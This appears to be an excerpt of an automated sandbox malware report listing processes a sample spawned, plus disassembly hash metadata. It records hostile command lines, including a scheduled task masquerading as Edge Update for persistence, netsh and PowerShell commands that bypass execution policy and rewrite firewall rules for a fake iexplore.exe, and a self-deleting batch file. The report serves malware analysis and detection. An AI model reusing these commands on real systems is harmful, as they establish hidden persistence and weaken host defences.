                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:13
                                                                                                                  Start time:07:25:30
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:14
                                                                                                                  Start time:07:25:33
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe"
                                                                                                                  Imagebase:0x1b9e5940000
                                                                                                                  File size:6'144 bytes
                                                                                                                  MD5 hash:962DB502E0DB073CAEB3A49FC7007776
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 42%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:15
                                                                                                                  Start time:07:25:33
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
                                                                                                                  Imagebase:0x600000
                                                                                                                  File size:42'244'190 bytes
                                                                                                                  MD5 hash:9B4B06703C314B8BD494570F443A74AE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 58%, ReversingLabs
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:16
                                                                                                                  Start time:07:25:33
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:18
                                                                                                                  Start time:07:25:33
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\ProgramData\Microsoft\Bound.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\ProgramData\Microsoft\Bound.exe"
                                                                                                                  Imagebase:0x212527c0000
                                                                                                                  File size:7'168 bytes
                                                                                                                  MD5 hash:A1F8A5C21AFC60D046C9075E41BB36A4
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 62%, ReversingLabs
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:20
                                                                                                                  Start time:07:25:34
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall delete rule name=all dir=in program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe'"
                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:21
                                                                                                                  Start time:07:25:34
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:22
                                                                                                                  Start time:07:25:34
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 280 -s 1376
                                                                                                                  Imagebase:0x7ff6af750000
                                                                                                                  File size:570'736 bytes
                                                                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:23
                                                                                                                  Start time:07:25:34
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\netsh.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name=all dir=in "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
                                                                                                                  Imagebase:0x7ff613a80000
                                                                                                                  File size:96'768 bytes
                                                                                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:24
                                                                                                                  Start time:07:25:35
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\selfdelete.bat""
                                                                                                                  Imagebase:0x7ff7ca4c0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:25
                                                                                                                  Start time:07:25:35
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:26
                                                                                                                  Start time:07:25:40
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
                                                                                                                  Imagebase:0x600000
                                                                                                                  File size:42'244'190 bytes
                                                                                                                  MD5 hash:9B4B06703C314B8BD494570F443A74AE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:27
                                                                                                                  Start time:07:25:43
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall delete rule name=all dir=out program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe'"
                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:28
                                                                                                                  Start time:07:25:43
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:29
                                                                                                                  Start time:07:25:43
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\netsh.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name=all dir=out "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
                                                                                                                  Imagebase:0x7ff613a80000
                                                                                                                  File size:96'768 bytes
                                                                                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:30
                                                                                                                  Start time:07:25:51
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall add rule name='Allow Internet Explorer Inbound' dir=in action=allow program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe' enable=yes profile=private,public"
                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:31
                                                                                                                  Start time:07:25:51
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:32
                                                                                                                  Start time:07:25:52
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\netsh.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\system32\netsh.exe" advfirewall firewall add rule "name=Allow Internet Explorer Inbound" dir=in action=allow "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" enable=yes profile=private,public
                                                                                                                  Imagebase:0x7ff613a80000
                                                                                                                  File size:96'768 bytes
                                                                                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:33
                                                                                                                  Start time:07:26:02
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall add rule name='Allow Internet Explorer Outbound' dir=out action=allow program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe' enable=yes profile=private,public"
                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:34
                                                                                                                  Start time:07:26:02
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:35
                                                                                                                  Start time:07:26:02
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\netsh.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\system32\netsh.exe" advfirewall firewall add rule "name=Allow Internet Explorer Outbound" dir=out action=allow "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" enable=yes profile=private,public
                                                                                                                  Imagebase:0x7ff613a80000
                                                                                                                  File size:96'768 bytes
                                                                                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:36
                                                                                                                  Start time:07:26:13
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp8B5F.tmp.bat""
                                                                                                                  Imagebase:0x7ff7ca4c0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:37
                                                                                                                  Start time:07:26:13
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:38
                                                                                                                  Start time:07:26:13
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\PING.EXE
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:ping 127.0.0.1 -n 2
                                                                                                                  Imagebase:0x7ff6816a0000
                                                                                                                  File size:22'528 bytes
                                                                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD9BB76605 Relevance: .4, Instructions: 437COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1912621694.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9bb70000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 32d1006c935c963f7b36cc507f9199f2a48487705f88271c930a47f32fe07508
                                                                                                                    • Instruction ID: 089dcc7b1dfcd00dcc5bd96fb9c69eadac1dc1697a0afa4d597bf05b74221852
                                                                                                                    • Opcode Fuzzy Hash: 32d1006c935c963f7b36cc507f9199f2a48487705f88271c930a47f32fe07508
                                                                                                                    • Instruction Fuzzy Hash: 95D12631A0FA8D4FE7A5EBA848A55B57BA0FF16318B0901FFD45ECB4E3D918A905C341
                                                                                                                    Function 00007FFD9BAAA114 Relevance: .2, Instructions: 239COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1911830483.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9baa0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a3c6ab27bc35836a357965a73c125c631fc2bfb1c78060dac392988370ecc6bc
                                                                                                                    • Instruction ID: 8b88c156b2aa0eea3ada7d4679af1dd2d50e1c1cc420883f2b5cf5c91e5d2eef
                                                                                                                    • Opcode Fuzzy Hash: a3c6ab27bc35836a357965a73c125c631fc2bfb1c78060dac392988370ecc6bc
                                                                                                                    • Instruction Fuzzy Hash: B401E57591E7CC8FDB539B34883A0947FB0EE27200B1A01EBD488CB0B3D6595908C7A2
                                                                                                                    Function 00007FFD9BB74073 Relevance: .2, Instructions: 183COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1912621694.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9bb70000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 873a093a0d3c6ef7fc1581dd8607a59a1ddf7c70a8bf21ae6cff73be4162655e
                                                                                                                    • Instruction ID: 289b7f7eb56921c21fda46d160f247cd35703dda53d27d19ac4e842e904d1b57
                                                                                                                    • Opcode Fuzzy Hash: 873a093a0d3c6ef7fc1581dd8607a59a1ddf7c70a8bf21ae6cff73be4162655e
                                                                                                                    • Instruction Fuzzy Hash: E4517B22B0EA8E0FE7A9EA5C44A25783BD2EF55325B1901BFC05DC79E3DE24EC018341
                                                                                                                    Function 00007FFD9BB74370 Relevance: .2, Instructions: 150COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1912621694.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9bb70000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 56c630d15df842da7100ef384ab4ef1695198493dc24d2dd8a0c230ae5394d87
                                                                                                                    • Instruction ID: 3fd837a52698f789b4aab3a031f692469a2523ecab4ff094ca348053c938b88a
                                                                                                                    • Opcode Fuzzy Hash: 56c630d15df842da7100ef384ab4ef1695198493dc24d2dd8a0c230ae5394d87
                                                                                                                    • Instruction Fuzzy Hash: 93410422B0EA8D0FEBB9D66854B15B877D1EF45329B1A01BFD05EC75E3EA14AD018381
                                                                                                                    Function 00007FFD9B98E620 Relevance: .1, Instructions: 127COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1911110132.00007FFD9B98D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B98D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9b98d000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: eccb737b9034d1f5d028d67f94c55e6ccf6a9a3228f70e11a7046ac1618bba7a
                                                                                                                    • Instruction ID: 6a840055be3611ff0ee8f1ebfba34a8ba50ddee15ede15ed7a28ba6da16c412f
                                                                                                                    • Opcode Fuzzy Hash: eccb737b9034d1f5d028d67f94c55e6ccf6a9a3228f70e11a7046ac1618bba7a
                                                                                                                    • Instruction Fuzzy Hash: 6341277140EFC45FE7569B39D8659523FF0EF52320B1A06DFE088CB1A3D625A846C7A2
                                                                                                                    Function 00007FFD9BAA979D Relevance: .1, Instructions: 117COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1911830483.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9baa0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1ff3de8ceea9a809cd4e030fbca44bc41dd63496f34b3bf67ea8bf0262dc2d5e
                                                                                                                    • Instruction ID: dca6883f6d920657cc353236312d02830126cffe62f7eb9aac1fe0c4fd430087
                                                                                                                    • Opcode Fuzzy Hash: 1ff3de8ceea9a809cd4e030fbca44bc41dd63496f34b3bf67ea8bf0262dc2d5e
                                                                                                                    • Instruction Fuzzy Hash: FA31B63191CB4C8FDB18DB5C980A6E9BBE1FB98721F00422FE44993251CA71A8558BC2
                                                                                                                    Function 00007FFD9BAAA64C Relevance: .1, Instructions: 101COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1911830483.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9baa0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b0199ed99591a99858e4db731851689d767d2769dcbd2567068ac1610aa6f83c
                                                                                                                    • Instruction ID: a4993fe76b9280c628ded002c502c3edf4eee6bb6d2f83e19c1581bf12f3a75e
                                                                                                                    • Opcode Fuzzy Hash: b0199ed99591a99858e4db731851689d767d2769dcbd2567068ac1610aa6f83c
                                                                                                                    • Instruction Fuzzy Hash: 1D21283090CA4C4FEB18DF9CD84A7E97BF0EB56321F04416BD048C3156CA74A446CBA1
                                                                                                                    Function 00007FFD9BB740BF Relevance: .1, Instructions: 96COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1912621694.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9bb70000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b0e0205de208031f633c7f105620606fae7c9f8c614a9fb3bd29e96dbcc74d8a
                                                                                                                    • Instruction ID: 75360abefbcabb083e226fc21634770cb02a4838b3dc858e87357616e8807f62
                                                                                                                    • Opcode Fuzzy Hash: b0e0205de208031f633c7f105620606fae7c9f8c614a9fb3bd29e96dbcc74d8a
                                                                                                                    • Instruction Fuzzy Hash: F521E522B1E98A0FE7B5EA5844B21786AD1FF55229B5A01BED05DC7DF2CE24ED008341
                                                                                                                    Function 00007FFD9BB743BC Relevance: .1, Instructions: 66COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1912621694.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9bb70000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3d4f0d574e53814496a7a0c8d8e81f922a2198d69d1b3f1bf2d16b66e0980648
                                                                                                                    • Instruction ID: 0834d1d920cc6cd928ca1920b84dd047e8e8cbec2388e494ca86defeb49c5b81
                                                                                                                    • Opcode Fuzzy Hash: 3d4f0d574e53814496a7a0c8d8e81f922a2198d69d1b3f1bf2d16b66e0980648
                                                                                                                    • Instruction Fuzzy Hash: 6811C132A0F5890FE7B5D66884B057C66D1FF4532AB5B00FED05DC79E2D914AD008341
                                                                                                                    Function 00007FFD9BAA33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1911830483.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd9baa0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                    • Instruction ID: fe27c77d210453ff9ac8e18656f571fdffb2d1ba2cecbf8df11bf048f1b1a8d7
                                                                                                                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                    • Instruction Fuzzy Hash: 5B01677121CB0C4FD748EF0CE451AA5B7E0FF95364F10056DE58AC76A5DA36E882CB45

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD9BAD062B Relevance: .4, Instructions: 440COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2214740036.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9bad0000_MicrosoftEdgeUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 381b93ccc14d2d0a3cad8d9a027d976298ec8ea2ff9b2bbcdb4c818680139d8e
                                                                                                                    • Instruction ID: af645a1bc29b62bae66f785c9cd0fbcb0f47f63a791198a85f925cee9a98bed2
                                                                                                                    • Opcode Fuzzy Hash: 381b93ccc14d2d0a3cad8d9a027d976298ec8ea2ff9b2bbcdb4c818680139d8e
                                                                                                                    • Instruction Fuzzy Hash: 3651E471E09A4D8FEB64EBA8C4606EDBBF0EF96710F05027AD019D71E6CE756841CB40
                                                                                                                    Function 00007FFD9BAD0B41 Relevance: .2, Instructions: 160COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.2214740036.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_7ffd9bad0000_MicrosoftEdgeUpdate.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 74e12ff6cd443e5464f8266149c76665e9b95e7d7b52d69c788ea22be157ed90
